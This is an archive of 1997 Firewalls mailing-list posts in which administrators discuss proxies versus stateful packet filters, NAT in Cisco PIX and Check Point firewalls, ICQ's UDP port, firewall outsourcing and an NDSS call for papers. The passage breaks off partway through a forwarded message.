(5.0.1457.3) id ; Fri, 6 Jun 1997 17:15:35 -0600 Message-ID: From: "Paquette, Trevor" To: "'Ian Poynter'" , "'Walczak, Joe'" , firewalls@GreatCircle.COM Subject: RE: ISP Connection Date: Fri, 6 Jun 1997 17:15:33 -0600 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have insurance for damage that may be caused by a break in. I don't know what type of insurance it is, but it is suppose to cover us in those situations. > -----Original Message----- > From: Ian Poynter [SMTP:ian@jerboa.com] > Sent: Friday, June 06, 1997 2:13 PM > To: Paquette, Trevor; 'Walczak, Joe'; firewalls@GreatCircle.COM > Subject: RE: ISP Connection > > At 12:01 AM 6/5/97 -0600, Paquette, Trevor wrote: > >There are companies (mine included) that do manage firewalls for > >other companies, and we do a pretty damn good job at it. Our clients > >TRUST us to do it for them. WE are the ones on the hook for any > >break-ins and possible damage resulting from any outside > >security incidents. > > I agree that whether to outsource firewall management (or anything > else for > that matter) is not a black and white issues. Trust, most of it > subjectively evaluated, has a lot to do with how these decisions get > made. > > However what I'm curious about is whether mcc.net is really completely > "on > the hook" in this situation. BBN's SitePatrol, for example, comes > with an > extensive indemnification clause in its agreements ("if you're broken > into, > we're not liable"). Are you saying that mcc.net doesn't have one of > these > clauses in their agreements? > > Of course, one always has the recourse to discontinue doing business > with > an outsourcer at any time, including after a break-in. > > Curiously, > Ian > > > ----- > Ian Poynter ian@jerboa.com > Jerboa, Inc. +1-617-492-8084 > PO Box 382648, Cambridge, MA 02238 http://www.jerboa.com > Providing unbiased Internet consulting for businesses. > PGP Fingerprint: BA 0C 82 C5 F2 03 3D 95 7C CE FD D3 57 4E 15 73 From owner-firewalls-outgoing Fri Jun 6 19:31:11 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA19079 for firewalls-outgoing; Fri, 6 Jun 1997 16:07:12 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA18917 for ; Fri, 6 Jun 1997 16:06:38 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA05197; Fri, 6 Jun 1997 19:10:37 -0400 Received: from vaxc.PIOS.COM (vaxc.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJRHHTMZOG8WZBJO@gemini.pios.com> for firewalls@greatcircle.com; Fri, 06 Jun 1997 19:12:38 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJRHFDLU0W8Y605X@PIOS.PIOS.COM>; Fri, 06 Jun 1997 19:10:41 -0400 (EDT) Date: Fri, 06 Jun 1997 16:14:41 -0700 From: Bill Stout Subject: Re: Stateful Packet Filters vs. Proxies X-Sender: stoutb@vaxf.pios.com To: Ryan Russell/SYBASE , Bill Stout Cc: firewalls Message-Id: <2.2.32.19970606231441.00747858@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:03 PM 6/6/97 -0400, Ryan Russell/SYBASE wrote: >Criticisms are welcome. Criticisms help me complete papers also, though I haven't received many 'you're an idiot' statements about my firewall-farms 'paper' which is why it's still v0.1. ;) ( http://www.geocities.com/researchtriangle/3372/firewall_farms.html ) >I was thinking today that I should say more about >application-specific proxies vs. generic proxies. >Socks is a good example of a generic proxy (at >least I believe that is the case) and is indeed >roughly equivalent to a packet filter, which is one >of my points. At least you agree on that. > >One of the things I'd like to have to better educate >myself is a list of proxies that do a good job of >understanding and interacting with the protocols. That would be the most valuable section of research done for your paper. A list of commands supported by HTTP proxies by vendor. A list of commands 'generically' plugged through by each proxy/vendor. That would expose which proxies fall back to generic functionality, and are as insecure as (excuse the statement) packet filters. With the help of the list, I hope to compile a list of intrusion tests one can fail a packet filter/generic proxy with. The list of failures with a packet filter should theoretically be larger than a list of failures by a generic proxy, since a (rule passing) packet is simply passed through a router, but is reconstructed by a gateway (proxy). Don't hold your breath for the list, as I do work for money as well as compile interesting lists. ;) >But, I think my point still stands, that if you have >more than a couple of protocols you have to >proxy, and you want to utilize non-generic proxies, >then you will end up using unrelated proxy software >for some of the protocols (Your examples of >RealAudio and SQLNet are good ones) and they will >have different feature sets, security models, and yes, >bugs. Translate bugs to mean potential holes or >weaknesses. Typically one only wants to pass traffic for which proxies exist. HTTP, FTP, HTTPS, NNTP, RealAudio, SQLnet for example. Using the RealAudio example, when RA first came out, there was no proxy for it (ignoring it was UDP for now) so most gatekeepers simply did not allow it. Good firewalls don't use generic proxies[tm]. Just say no[propoganda plagerism]. AFA Bugs - Considering that the MS-TCP/IP stack for example has been in use for some time, and only recently many, many flaws have been discovered in it, it would stand to reason that an untested proxy would also have a few flaws as well. Admittedly poor logic, but you get my point. >The converse of that could be: If you have n proxies >that all understand and interact with the protocol >in a meaningful way, and they all have 0 bugs, >and they work exactly how you want, isn't that >better than a layer 4 SPF? Yup. I think you re-summarized your own paper right then. >The above situation is a case where a SPF, as a >unified security program, may be a better choice. >It would be extreamly difficult to pick the cutoff >point (i.e. if you have 5 proxies, just go to SPF) given >that you probably lose some control over the protocols >that you had before, but are now dealing with less holes, etc.. > >BTW, doesn't the proxy for SQLNet exist because the >protocol is complex, not to increase correctness of the >data? I.e. a non-stateful packet filter would have to leave >too many ports "open"? I wouldn't know, maybe an Oracle person can respond since I believe Oracle wrote/sold the SQLnet proxy to the firewall vendors. I'll bet I can count on my hand the number of people that really understand the SQLnet proxy. >As for the last part of your note: I'll go back and >re-read how I worded my conclusions, but what I mean >to say is that generic proxies are equivalent to >stateful packet filters. > >I also conclude that NAT is darn close to a generic proxy >and a SPF, if you are using many-to-few translation >and the NAT device doesn't allow the outside to initiate >connections, which is probably a side-effect of most >implmentations of many-to-few NAT. Um, an address translator does not a filter make[tm]. >Thanks for the feedback. > Ryan > > >---------- Previous Message ---------- Bill Stout P.S. - Political question - 'American Rivers Heritage Act', related to 'Heritage areas' which monitors by satellite National parks and it's visitors, is this really giving these areas to U.N. control as claimed by House Rep Don Young? Can't be. That's far right 'U.N. conspiracy' militia talk. Isn't it? http://www.reagan.com/mfcon/mike/HotTopics/document-6.5.1997.9.html From owner-firewalls-outgoing Fri Jun 6 19:46:13 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA16217 for firewalls-outgoing; Fri, 6 Jun 1997 13:28:50 -0700 (PDT) Received: from geocities.com (mail4.geocities.com [204.7.246.134]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA16144 for ; Fri, 6 Jun 1997 13:28:33 -0700 (PDT) Received: from ppp01-braila.iiruc.ro (ppp01-braila.iiruc.ro [193.226.145.211]) by geocities.com (8.7.5/8.7.3) with SMTP id NAA23546; Fri, 6 Jun 1997 13:30:49 -0700 (PDT) Message-ID: <3398CBF5.7E16@geocities.com> Date: Fri, 06 Jun 1997 19:48:21 -0700 From: Gabriel Dura Reply-To: dura@geocities.com X-Mailer: Mozilla 3.01Gold (Win95; I; 16bit) MIME-Version: 1.0 To: Pat Verner CC: firewalls@GreatCircle.COM Subject: Re: ICQ and udp port 4000 References: <01BC71C6.F91382C0@MS254.isis.co.za> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi! I use ICQ for some time... It is a chat utility but unlike a normal IRC client is design for direct connection between computers. The main idea behind this product is to find someone you want very fast... I don't think you have any other sources of information about this product because it is very new... Also tehnical support is unreliable... Most of the ppl I know use it for it's user interface and it's features. About security... I think all risks from DCC are the same here... I never heared anyone complain about security problems but all the people I know are using it at home where security is not very important. If there is anything I can help I'll be glad to do it Regards, Gabriel Pat Verner wrote: > > > I have just had a request to open port 4000 for outgoing UDP in order to > support a product called ICQ. I must confess to being loathe to open > unnecessary udp ports, but don't want to let prejudice influence me > unduly.. > > Does anyone know anything about this product, and what the security > implications would be in opening the port? Any comments would be > appreciated. > > There is a blurb about ICQ on http://www.mirabilis.com/ > > Thanks in anticipation .. > =Pat From owner-firewalls-outgoing Fri Jun 6 20:01:49 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA04700 for firewalls-outgoing; Fri, 6 Jun 1997 15:02:25 -0700 (PDT) Received: from toadflax.cs.ucdavis.edu (toadflax.cs.ucdavis.edu [128.120.56.188]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id PAA04522 for ; Fri, 6 Jun 1997 15:01:48 -0700 (PDT) Received: from nob (nob.cs.ucdavis.edu) by toadflax.cs.ucdavis.edu (4.1/UCD.CS.2.6) id AA07448; Fri, 6 Jun 97 15:05:46 PDT Received: by nob (SMI-8.6/UCDCS.SECLAB.Solaris2-2.0) id PAA09052; Fri, 6 Jun 1997 15:05:44 -0700 Date: Fri, 6 Jun 1997 15:05:44 -0700 From: bishop@cs.ucdavis.edu (Matt Bishop) Message-Id: <199706062205.PAA09052@nob> To: firewalls@greatcircle.com Subject: CFP: 1998 Symposium on Network and Distributed System Security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk CALL FOR PAPERS The Internet Society Symposium on Network and Distributed System Security Where: San Diego, California When: March 1998 GOAL: The symposium will foster information exchange between hardware and software developers of network and distributed system security services. The intended audience is those who are interested in the practical aspects of network and distributed system security, focusing on actual system design and implementation, rather than theory. Encouraging and enabling the Internet community to apply, deploy, and advance the state of available security technology is the major focus of symposium. Symposium proceedings will be published by the Internet Society. Topics for the symposium include, but are not limited to, the following: * Architectures for large-scale, heterogeneous distributed systems * Security in malleable systems: mobile code, mobile agents, dynamic policy updates, etc. * Special problems: e.g. interplay between security goals and other goals -- efficiency, reliability, interoperability, resource sharing, and cost. * Integrating security services with system and application security facilities and with application protocols, including message handling, file transport, remote file access, directories, time synchronization, data base management, routing, voice and video multicast, network management, boot services, and mobile computing. * Fundamental services: authentication, integrity, confidentiality, authorization, non-repudiation, and availability. * Supporting mechanisms and APIs: key management and certification infrastructures, audit, and intrusion detection. * Telecommunications security, especially for emerging technologies -- very large systems like the Internet, high-speed systems like the gigabit testbeds, wireless systems, and personal communication systems. * Controls: firewalls, packet filters, application gateways * Object security and security objects * Network information resources and tools such as World Wide Web (WWW), Gopher, Archie, and WAIS. * Electronic commerce: payment services, fee-for-access, EDI, notary; endorsement, licensing, bonding, and other forms of assurance; intellectual property protections GENERAL CHAIR: David Balenson, Trusted Information Systems PROGRAM CHAIRS: Matt Bishop, University of California at Davis Steve Kent, BBN PROGRAM COMMITTEE: Steve Bellovin, AT&T Labs -- Research Doug Engert, Argonne National Laboratories Warwick Ford, VeriSign Li Gong, JavaSoft Rich Graveman, Bellcore Ari Juels, RSA Laboratories Tom Longstaff, CERT/CC Doug Maughan, National Security Agency Dan Nessett, 3Com Corporation Rich Parker, NATO Michael Roe, Cambridge University Rob Rosenthal, DARPA Wolfgang Schneider, GMD Darmstadt Christoph Schuba, Purdue University Win Treese, Open Market, Inc. Jonathan Trostle, Novell Gene Tsudik, USC/Information Sciences Institute Steve Welke, Institute for Defense Analyses LOCAL ARRANGEMENTS CHAIR: Thomas Hutton, San Diego Supercomputer Center PUBLICATIONS CHAIR: Steve Welke, Institute for Defense Analyses LOGISTICS CHAIR: Torryn Brazell, Internet Society SUBMISSIONS: The committee invites technical papers and panel proposals, for topics of technical and general interest. Technical papers should be 10-20 pages in length. Panel proposals should be two pages and should describe the topic, identify the panel chair, explain the format of the panel, and list three to four potential panelists. Technical papers will appear in the proceedings. A description of each panel will appear in the proceedings, and may at the discretion of the panel chair, include written position statements from each panelist. Each submission must contain a separate title page with the type of submission (paper or panel), the title or topic, the names of the author(s), organizational affiliation(s), telephone and FAX numbers, postal addresses, Internet electronic mail addresses, and must list a single point of contact if more than one author. The names of authors, affiliations, and other identifying information should appear only on the separate title page. Submissions must be received by 1 August 1997, and should be made via electronic mail in either PostScript or ASCII format. If the committee is unable to print a PostScript submission, it will be returned and hardcopy requested. Therefore, PostScript submissions should arrive well before 1 August. If electronic submission is difficult, submissions should be sent via postal mail. All submissions and program related correspondence (only) should be directed to the program chair: Matt Bishop, Department of Computer Science, University of California at Davis, Davis CA 95616-8562, Email: sndss98-submissions@cs.ucdavis.edu. Phone: +1 (916) 752-8060, FAX: +1 (916) 752-4767, Dates, final call for papers, advance program, and registration information will be available at the URL: http://www.isoc.org/conferences/ndss98. Each submission will be acknowledged by e-mail. If acknowledgment is not received within seven days, please contact the program chair as in- dicated above. Authors and panelists will be notified of acceptance by 1 October 1997. Instructions for preparing camera-ready copy for the proceedings will be sent at that time. The camera-ready copy must be received by 1 November 1997. From owner-firewalls-outgoing Fri Jun 6 20:31:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA20453 for firewalls-outgoing; Fri, 6 Jun 1997 18:42:12 -0700 (PDT) Received: from proxy3.ba.best.com (proxy3.ba.best.com [206.184.139.14]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA20202 for ; Fri, 6 Jun 1997 18:41:13 -0700 (PDT) Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by proxy3.ba.best.com (8.8.5/8.8.3) with ESMTP id SAA28172 for ; Fri, 6 Jun 1997 18:45:14 -0700 (PDT) Received: from localhost (kgibbs@localhost) by shellx.best.com (8.8.5/8.8.3) with SMTP id SAA15612 for ; Fri, 6 Jun 1997 18:43:49 -0700 (PDT) Date: Fri, 6 Jun 1997 18:43:49 -0700 (PDT) From: "Kelly E. Gibbs" To: firewalls@greatcircle.com Subject: PIX Question... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is it fair to assume that PIX does not alter data content, for example, if I FTP to another host through 2 pix boxes, the FTP PORT command would reveal the IP address - correct? 10.10.2.2 ---> 10.20.2.1 |-| 10.20.3.1 ------> 10.10.3.3 PIX PIX From owner-firewalls-outgoing Fri Jun 6 20:46:12 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA01459 for firewalls-outgoing; Fri, 6 Jun 1997 19:47:19 -0700 (PDT) Received: from zonk.geko.net.au (zonk.geko.net.au [203.2.239.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA01408 for ; Fri, 6 Jun 1997 19:46:59 -0700 (PDT) Received: from mozart.void.hell.net ([203.25.224.225]) by zonk.geko.net.au (8.8.5/8.6.12) with ESMTP id NAA29515; Sat, 7 Jun 1997 13:00:29 +1000 (EST) Received: from beethoven ([192.168.0.2]) by mozart.void.hell.net with smtp id m0waBYR-000Jn4C (Debian Smail-3.2 1996-Jul-4 #2); Sat, 7 Jun 1997 12:48:35 +1000 (EST) Message-Id: From: "Norman Widders" Date: Sat, 7 Jun 1997 12:45:43 +1000 GMT Subject: RE: ISP Connection To: Reply-To: Organization: WCE Consulting X-Mailer: Paladin IMAP4 Client v2.0 Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: 7BIT Content-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A certain ISP has set it so you can not change your password using the passwd command. One has to make a phone call to them everytime you want to change it. My concern is what is there to prevent eavesdropping when saying the password over the telephone. Do any other ISP's practice this worrying method ? What do you think, is this a safe practice for the ISP to be employing ? -- +--------------------------------------------------------------+ | #include | | | | E-MAIL: winspace@geko.net.au | | HOMEPAGE: http://www.geocities.com/ResearchTriangle/4431 | | | +--------------------------------------------------------------+ From owner-firewalls-outgoing Fri Jun 6 21:01:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA10986 for firewalls-outgoing; Fri, 6 Jun 1997 20:30:29 -0700 (PDT) Received: from Concord01.POP.InterNex.Net (concord01.pop.InterNex.Net [205.158.3.82]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA10806 for ; Fri, 6 Jun 1997 20:29:56 -0700 (PDT) Message-Id: <199706070329.UAA10806@honor.greatcircle.com> Received: from [205.158.182.129] by Concord01.POP.InterNex.Net (post.office MTA v1.7 ID# 0-11026) with SMTP id AAA26704; Fri, 6 Jun 1997 20:34:08 -0700 Subject: Re: [FW1] Address Translation with Firewall 2.1 on Solaris 2.5.1 Date: Fri, 6 Jun 97 11:34:09 -0500 x-sender: INX-10108b@Concord01.POP.InterNex.Net x-mailer: Claris Emailer 2.0, March 15, 1997 From: Bill Husler To: "Raymond Sleiman" , "fw-1-mailinglist@us.checkpoint.com" , "firewalls@GreatCircle.COM" Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I believe NAT will not take effect until the next Policy Install. Bill As previously stated by Raymond Sleiman >Hello, >I defined address translation on a firewall gateway as fellow: > >193.246.62.140 193.246.62.140 DST_STATIC >195.176.150.10 >195.176.150.10 195.176.150.10 SRC_STATIC >193.246.62.140 > >I add with arp -s 195.176.150.10 ehternet_address of the machine >193.246.62.10 PUB. >I also defines staic routes to 193.246.62.140 using the internal >interface of the firewall. >route add 195.176.150.10 Ipaddress of the internal interface >193.246.62.2 > >The internal interface has 193.246.62.2 as IP address. >The external interface has 195.176.150.2 as IP address This address in >registered address. > >the class 195.176.150.0 is a registeres class >the class 193.246.62.0 is not a registered address. >Adresses are samples and not reality. > >The problem: i am not able to ping the translated address 195.176.150.10 >from the internet and from the inside and from the gateway itself. > >Could someone tell me what is wrong ? > >Another question: where we should define address translation. >How to load address translation table ( xlate.conf ) ? DO we have to >lunch a command to load address translation configuration ? > >is static routes are correct ? >Best regards >Raymond Sleiman > Please remember to always flame via private eMail - the rest of the group is just not interested. From owner-firewalls-outgoing Fri Jun 6 21:16:23 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA16263 for firewalls-outgoing; Fri, 6 Jun 1997 21:04:58 -0700 (PDT) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA16246 for ; Fri, 6 Jun 1997 21:04:51 -0700 (PDT) Received: from clonvick-pc.cisco.com (sj-dial-3-8.cisco.com [171.68.179.9]) by diablo.cisco.com (8.8.5/CISCO.SERVER.1.2) with SMTP id VAA16042; Fri, 6 Jun 1997 21:08:45 -0700 (PDT) Message-Id: <2.2.32.19970607040738.0069fc88@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 06 Jun 1997 23:07:38 -0500 To: "Kelly E. Gibbs" , firewalls@GreatCircle.COM From: Chris Lonvick Subject: Re: PIX Question... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Kelly, The PIX conforms to RFC-1631. The big example that they give in that RFC is the case of ftp. There are some ftp commands that embed the IP address into the payload, just like you noted. The PIX (like most other NAT devices - and actually I can't think of any that don't) will actually look into the payload and convert the appropriate addresses it finds there. And, like the RFC says, the IP and TCP checksums will need to be recalculated before it can be forwarded. The RFC also mentions ICMP as another protocol that will require checking for addresses embedded in the payload. Since that time, there have been a lot of protocols which also embed some of the IP or TCP header information into the payload. This is the challenge of all NAT engineers; to keep up with the new protocols and make sure that they work through the NATificator. And actually (since I'm thinking about it and I still have a glug of beer left in the bottle), the PIX engineers told me that RFC-1001/1002 NetBIOS/TCP/IP has the IP addresses embedded in various frames at mobile places. Yech. In your example, the right PIX would convert the IP source address in the IP header as well as any occurances of the source address in the payload for outgoing frames. The left PIX would convert the destination IP address as well as any occurances of that in the payload for incoming packets. As long as the PIXen maintain translation tables, the session will be built between the two end stations. (And, in fact, this will be just the same for any other NATificators.) Hope this helps, Chris Lonvick Cisco Systems Consulting Engineering Houston, TX, USA +1.713.778.5663 At 06:43 PM 6/6/97 -0700, Kelly E. Gibbs wrote: > >Is it fair to assume that PIX does not alter data content, for example, if >I FTP to another host through 2 pix boxes, the FTP PORT command would >reveal the IP address - correct? > > > 10.10.2.2 ---> 10.20.2.1 |-| 10.20.3.1 ------> 10.10.3.3 > PIX PIX > > > > > > From owner-firewalls-outgoing Fri Jun 6 21:28:49 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA10663 for firewalls-outgoing; Fri, 6 Jun 1997 20:28:46 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA02642 for ; Fri, 6 Jun 1997 19:53:28 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id UAA15704 for ; Fri, 6 Jun 1997 20:01:04 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA13191; Fri, 6 Jun 97 19:58:53 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id TAA09836 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Fri, 6 Jun 1997 19:57:46 -0700 (PDT) Message-Id: <199706070257.TAA09836@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 4F335E6FE0D5D758882564AF00107137; Fri, 6 Jun 97 19:57:42 EDT To: "Kelly E. Gibbs" Cc: Ryan Russell/SYBASE , Bill Stout , firewalls From: Ryan Russell/SYBASE Date: 6 Jun 97 20:04:23 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, the NAT I'm talking about specifically (IP NAT products like the ones from Checkpoint and Cisco, and probably others) work at layer 4. They need to understand TCP and so-forth. One could write one that works strictly at layer 3, but for many IP protocols it wouldn't work very well, and certainly wouldn't work for many-to-few NAT implementations. Anything above layer 4 would probably be called an application gateway, or maybe a proxy :) Layer 2 NAT implementations would probably be called translational bridges. I can't think of a layer 1 standard that includes anything one could call an address... Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: stoutb, firewalls From: kgibbs @ best.com ("Kelly E. Gibbs") @ smtp Date: 06/06/97 06:51:55 PM Subject: Re: Stateful Packet Filters vs. Proxies At what level does the NAT occur in the OSI model? So far I've heard 2 and 4... whats the right answer? On 6 Jun 1997, Ryan Russell/SYBASE wrote: > Criticisms are welcome. > > I was thinking today that I should say more about > application-specific proxies vs. generic proxies. > Socks is a good example of a generic proxy (at > least I believe that is the case) and is indeed > roughly equivalent to a packet filter, which is one > of my points. At least you agree on that. > > One of the things I'd like to have to better educate > myself is a list of proxies that do a good job of > understanding and interacting with the protocols. > > But, I think my point still stands, that if you have > more than a couple of protocols you have to > proxy, and you want to utilize non-generic proxies, > then you will end up using unrelated proxy software > for some of the protocols (Your examples of > RealAudio and SQLNet are good ones) and they will > have different feature sets, security models, and yes, > bugs. Translate bugs to mean potential holes or > weaknesses. > > The converse of that could be: If you have n proxies > that all understand and interact with the protocol > in a meaningful way, and they all have 0 bugs, > and they work exactly how you want, isn't that > better than a layer 4 SPF? Yup. > > The above situation is a case where a SPF, as a > unified security program, may be a better choice. > It would be extreamly difficult to pick the cutoff > point (i.e. if you have 5 proxies, just go to SPF) given > that you probably lose some control over the protocols > that you had before, but are now dealing with less holes, etc.. > > BTW, doesn't the proxy for SQLNet exist because the > protocol is complex, not to increase correctness of the > data? I.e. a non-stateful packet filter would have to leave > too many ports "open"? > > As for the last part of your note: I'll go back and > re-read how I worded my conclusions, but what I mean > to say is that generic proxies are equivalent to > stateful packet filters. > > I also conclude that NAT is darn close to a generic proxy > and a SPF, if you are using many-to-few translation > and the NAT device doesn't allow the outside to initiate > connections, which is probably a side-effect of most > implmentations of many-to-few NAT. > > Thanks for the feedback. > Ryan > > > ---------- Previous Message ---------- > To: Ryan.Russell, firewalls > cc: > From: stoutb@pios.com (Bill Stout) @ smtp > Date: 06/06/97 11:15:43 AM > Subject: Re: Stateful Packet Filters vs. Proxies > > Forgive my criticisms: > > The paper is founded on some incorrect assumptions. > > It groups application specific proxies with generic proxies. Generic or > 'plug-gw' proxies are not desireable because they don't filter application > commands, and are viewed as nearly as weak as packet filtering. Application > specific proxies are aware (to varying levels) of application commands. > > A proxy server typically comprises of application specific proxies, and does > not comprise of only generic proxies. Generic proxies are avoided at all > costs, at least until management wants 'something added'. Occasionally > generic proxies are used as last resort, then replaced, for example > RealAudio and SQLnet were initially filtered with plug-gw proxies until > application (RealAudio/SQLnet) specific proxies were released. > > The paper then continues to compare generic proxy functions with packet > filters and concludes they are the same. A discussion on NAT ensues which > is not an equivalent technology to either. > > Bill Stout > > At 12:29 AM 6/6/97 -0400, Ryan Russell/SYBASE wrote: > >Well, I finally got around to writing down my arguments > >on the above subject. Check it out at: > > > >http://futon.sfsu.edu/~rrussell/spfvprox.htm > > > >Warning: It's lengthy. > > > >Comments welcome. > > > > Ryan > > > _____________________________________________________________________________ > Bill Stout (Systems Engineer/Consultant) stoutb@pios.com > Pioneer Standard (Computer Systems & Components) http://www.pios.com/ > San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 > *My opinions do not reflect that of the company, and visa-versa, thankfully.* > > > > > From owner-firewalls-outgoing Fri Jun 6 23:31:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA29233 for firewalls-outgoing; Fri, 6 Jun 1997 23:15:35 -0700 (PDT) Received: from zen.quick.com.au (gate.quick.com.au [203.12.250.130]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id XAA29223 for ; Fri, 6 Jun 1997 23:15:26 -0700 (PDT) Received: (from sjg@localhost) by zen.quick.com.au (8.8.5/8.7.3) id QAA25566; Sat, 7 Jun 1997 16:19:41 +1000 (EST) Date: Sat, 7 Jun 1997 16:19:41 +1000 (EST) From: "Simon J. Gerraty" Message-Id: <199706070619.QAA25566@zen.quick.com.au> To: Ryan Russell/SYBASE Cc: firewalls@greatcircle.com Subject: Re: Stateful Packet Filters vs. Proxies References: <199706060722.AAA16788@notesgw2.sybase.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ryan Russell writes: >Well, I finally got around to writing down my arguments >on the above subject. Check it out at: >>I hope to convince the reader, to whatever degree I can, of the following: >> 1.Proxies are a special case of a SPF. >> 2.SPFs can be the more secure choice depending on the requirements. >> 3.Network address translation (NAT) can be considered a form of >> security on it's own. One thing to note - SPF and crypto do not mix. I saw a case last week where users behind a PIX firewall could not use an encrypted FTP, because the PIX box could not inspect the content of PORT commands and allow the data ports to be connected to. Solutions are: 1. Use passive mode transfers. 2. Turn off the filtering in the PIX :-) 3. Do without crypto :-) 1 is obviously preferable if both sides can handle it - not always the case. The other two are not attractive at all. If they'd been using a proxy, they would not have had a problem. --sjg -- Simon J. Gerraty #include /* imagine something _very_ witty here */ From owner-firewalls-outgoing Sat Jun 7 01:06:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA03714 for firewalls-outgoing; Sat, 7 Jun 1997 00:46:51 -0700 (PDT) Received: from pdx.com.my (pdx.com.my [192.228.144.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA03707 for ; Sat, 7 Jun 1997 00:46:42 -0700 (PDT) Received: from wsm.pdx.com.my by pdx.com.my with smtp (Smail3.1.29.1 #3) id m0waGA5-000BGhC; Sat, 7 Jun 97 15:43 GMT+0800 Message-ID: <33991302.38F0@pdx.com.my> Date: Sat, 07 Jun 1997 15:51:30 +0800 From: Wong Organization: CSNet X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: [Fwd: Re: Microsoft Proxy Server] Content-Type: message/rfc822 Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk X-POP3-Rcpt: wong_sm@raptor Return-Path: Received: from punt-1.mail.demon.net by pdx.com.my with smtp (Smail3.1.29.1 #3) id m0wZvZb-000BGWC; Fri, 6 Jun 97 17:44 GMT+0800 Received: from axelf.demon.co.uk ([158.152.252.32]) by punt-2.mail.demon.net id aa0616533; 6 Jun 97 10:50 BST Message-ID: Date: Fri, 6 Jun 1997 10:48:17 +0100 To: Wong From: Simon Foley Subject: Re: Microsoft Proxy Server In-Reply-To: <33956691.57F6@pdx.com.my> MIME-Version: 1.0 X-Mailer: Turnpike Version 3.03a In article <33956691.57F6@pdx.com.my>, Wong writes Hi, I'm sorry to mail this responce to you but, I have never been able to get a posting through to this news group. If you wish to post it fore me that would be appreciated! Your message follows: Received: from axelf.demon.co.uk ([158.152.252.32]) by punt- 2.mail.demon.net id aa0611217; 6 Jun 97 10:35 BST Message-ID: Date: Fri, 6 Jun 1997 10:33:52 +0100 To: muc-lists-firewalls@moderators.uu.net From: Simon Foley Newsgroups: muc.lists.firewalls Subject: Re: Microsoft Proxy Server Path: axelf.demon.co.uk!SIMON References: <882564A1.00018A6A.00@isc_domino.iscci.com> <33956691.57F6@pdx.com.my> Lines: 71 Organization: Eric Cantona Is God MIME-Version: 1.0 Distribution: world X-Newsreader: Turnpike Version 3.03a In article <33956691.57F6@pdx.com.my>, Wong writes Just thourght I would add my two pence worth, and I use MSProxy! >> 